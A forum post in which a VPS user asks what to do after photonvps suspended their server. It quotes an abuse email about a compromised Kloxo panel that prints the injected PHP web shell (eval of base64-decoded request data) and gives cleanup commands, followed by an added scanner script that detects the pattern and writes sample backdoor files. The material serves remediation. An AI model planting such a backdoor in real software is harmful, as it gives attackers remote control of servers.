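I went home for the Chinese New Year holiday and photonvps suspended my VPS. Now they flatly refuse to reactivate it and I don't know what to do. The website data on the VPS was not backed up before the holiday, so I want them to reactivate it so that I can make a backup. The conversation is below. What should I do now?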
photonvps
This is an easy fix. Give me the credentials and I'll fix it for you.
Me
I now know there is a loophole in the VPS control panel, but now I cannot connect to repair it. I also want to back up the site data and then reinstall the VPS in the control panel. Can you help me open the VPS and let me do this?
photonvps
You are not reading the emails we sent you saying that your kloxo has an exploit that we needed you to clean? I am sorry, but if you ignore us we won't be able to help you with this type of abuse.
Your kloxo has an exploit. You needed to clean it but you ignored us, so we suspended you to stop attacks from your VM. If you want us to help you, give us your server credentials; otherwise we are going to terminate this account.
Me
photonvps
Hello,
Your account has been suspended because you did not respond to the abuse ticket within 24 hours.
Thank you.
Hello,
This is the abuse department sending you an important email alert of a backdoor botnet exploit with your kloxo panel that needs fixing ASAP!
This problem was brought to our attention by alerts that we received from banks that were receiving attacks from your control panel and other forms of virus detections.
Fortunately this exploit can be fixed by following the instructions listed below.
Find files that were modified on the 27th of this month.
find /home/kloxo/httpd/default/* -mtime -4 -iname "*.php"
You should get something similar to this:
/home/kloxo/httpd/default/default.php
/home/kloxo/httpd/default/defuzx.php
/home/kloxo/httpd/default/emptzx.php
The defuzx.php and emptzx.php files were uploaded, and are the exploit that needs deleting.
You can inspect the backdoor code that was injected by the hacker to gain access to your account.
<?php
set_time_limit(0);error_reporting(NULL);
if(($_REQUEST['36753c7000fab6fec6700cbf0ef8'])!=NULL){eval(base64_decode($_REQUEST['36753c7000fab6fec6700cbf0ef8']));}
else{echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title></title></head><body>Access denied.</body ></html >';}
?>
To remove the exploit we do:
rm -fr /home/kloxo/httpd/default/emptzx.php
rm -fr /home/kloxo/httpd/default/defuzx.php
Make sure to only delete the files that were modified on the 27th. The default.php file changed due to the kloxo being hacked, so to fix that we need to update kloxo and change the admin password.
Update kloxo: /scripts/upcp
Then finalize the fix by changing your kloxo admin panel password.
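
The triage steps from the abuse email above (find recently modified PHP files, inspect them, delete only the dropped ones), as an added shell example that is not part of the original post or of photonvps's email. The function names, the SUSPECT/REVIEW labels and the sample files built by make_sample are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the email: list PHP files changed in the last N days
# under a web root and flag those with the request-driven eval pattern.

# Matches eval(base64_decode($_REQUEST[...])) and the POST/GET/COOKIE variants.
PATTERN='eval[[:space:]]*\([[:space:]]*base64_decode[[:space:]]*\([[:space:]]*\$_(REQUEST|POST|GET|COOKIE)'

# scan_webroot DIR [DAYS]  (hypothetical helper)
#   SUSPECT <path>  recently modified and matches PATTERN
#   REVIEW  <path>  recently modified, no match: inspect by hand before deleting
# Assumes file names contain no newlines.
scan_webroot() {
    dir=$1
    days=${2:-4}   # same window as the email's "find ... -mtime -4"
    find "$dir" -type f -iname '*.php' -mtime "-$days" | sort |
    while IFS= read -r f; do
        if grep -Eq "$PATTERN" "$f"; then
            printf 'SUSPECT %s\n' "$f"
        else
            printf 'REVIEW  %s\n' "$f"
        fi
    done
}

# count_suspects DIR [DAYS]: number of SUSPECT files, e.g. for a cron alert.
count_suspects() {
    scan_webroot "$@" | grep -c '^SUSPECT ' || true
}

# make_sample DIR: constructed fixture (file names and contents are made up).
make_sample() {
    mkdir -p "$1/sub"
    printf '%s\n' '<?php if($_REQUEST["k"]!=NULL){eval(base64_decode($_REQUEST["k"]));} ?>' > "$1/sub/dropped.php"
    printf '%s\n' '<?php echo "hello"; ?>' > "$1/index.php"
    printf '%s\n' '<?php eval(base64_decode($_POST["x"])); ?>' > "$1/old.php"
    touch -t 200001010000 "$1/old.php"   # dated outside the time window
}

# Run against a directory when one is given on the command line, e.g.
#   sh scan.sh /home/kloxo/httpd/default 4
if [ "$#" -gt 0 ]; then
    scan_webroot "$@"
fi
```

Files reported as REVIEW still need manual inspection, as with default.php in the email.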